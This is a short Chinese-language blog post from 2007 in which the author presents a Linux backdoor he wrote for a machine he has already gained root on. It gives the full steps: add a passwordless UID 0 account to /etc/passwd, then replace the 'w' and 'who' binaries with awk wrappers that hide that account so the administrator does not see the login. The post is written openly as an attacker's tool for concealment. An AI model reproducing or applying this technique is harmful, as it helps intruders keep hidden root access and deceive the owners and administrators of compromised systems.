我写的一个Linux后门脚本

时间：2007-04-03 来源：net_liufeng

今天看了遍awk文档，正好写了个小小的Linux木马，全部过程如下，对与一般的只是使用w 还有who 不加参数的系统管理员来说足够了：首先已经登陆了对方系统并是root权限，然后不用新建用户，只要在/etc/passwd文件中新加一个用户，使其UID为0即可，还有登陆shell随便给个存在的路径，密码一项直空吧。然后如果用这个帐号（姑且称之为test吧）登陆的话，在w who这些系统管理工具还是能查看到test用户登陆的，这里不讨论查看登陆日志，那些东东，只要能在w who这两个里面不显示就OK了，因为我知道对方不经常查看日志，倒是经常 w 或者who 一下，哈哈好了，先盗亦有道，先备份w 和who ：mv /usr/bin/w /bin/w2 ; mv /usr/bin/who /bin/who2 然后写个脚本实现咱的“伎俩”：这里随便选用个awk即可，呵呵杀鸡还祭出这么把大刀，小用啦：——） /bin/w2 | awk '{if($1!=test) print $0}' 把以上代码vi 到 /usr/bin/w 中去，同样对who的处理，只是把上面这个脚本中的w 换成who即可，还要给SHELL脚本执行权哦：chmod 777 /usr/bin/w ; chmod 777 /usr/bin/who OK 了，用咱的后门根权限用户test登陆，然后在这边SSH里用w who 查看的时候，哈哈，都没有test的登陆信息啦：）

相关阅读更多 +